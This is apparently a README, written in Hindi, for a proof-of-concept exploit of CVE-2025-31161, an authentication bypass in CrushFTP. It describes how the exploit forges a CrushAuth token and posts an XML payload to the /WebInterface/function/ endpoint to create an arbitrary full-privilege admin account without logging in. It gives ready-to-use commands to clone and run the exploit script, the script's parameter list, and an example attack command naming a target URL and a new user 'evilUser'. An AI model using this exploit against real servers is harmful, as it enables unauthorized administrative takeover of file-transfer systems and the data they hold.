
PoC CVE-2025-31161 - CrushFTP प्रमाणीकरण बाईपास
PoC CVE-2025-31161 - CrushFTP प्रमाणीकरण बाईपास
CrushAuth टोकन बनाने और पूर्ण विशेषाधिकार वाला एडमिन उपयोगकर्ता बनाने की अनुमति देता है।यह एक्सप्लॉइट CrushFTP में एक गंभीर कमजोरी को लक्षित करता है, जो दूरस्थ अनअथेंटिकेटेड हमलावरों को प्रमाणीकरण बाईपास करने और मनमाना एडमिन उपयोगकर्ता बनाने की अनुमति देता है।
यह वैध दिखने वाला CrushAuth टोकन तैयार करके और /WebInterface/function/ endpoint का दुरुपयोग करके पूर्ण रूप से गठित XML payload सबमिट करके काम करता है।
curlshufgit clone https://github.com/f4dee-backup/CVE-2025-31161
cd CVE-2025-31161
chmod +x CVE-2025-31161.sh
./CVE-2025-31161.sh --help
[?] Parameters description:
--url Target base URL (e.g., http://target)
--port Port where CrushFTP is running
--target-user Valid or invalid username (e.g., crushadmin)
--new-user Username to be created (e.g., Pwn3d)
--new-password Password for the new user
--help Show this help panel
[i] Example: ./CVE-2025-31161.sh --url http://target.com --port 80 --target-user crushadmin --new-user evilUser --new-password pass12345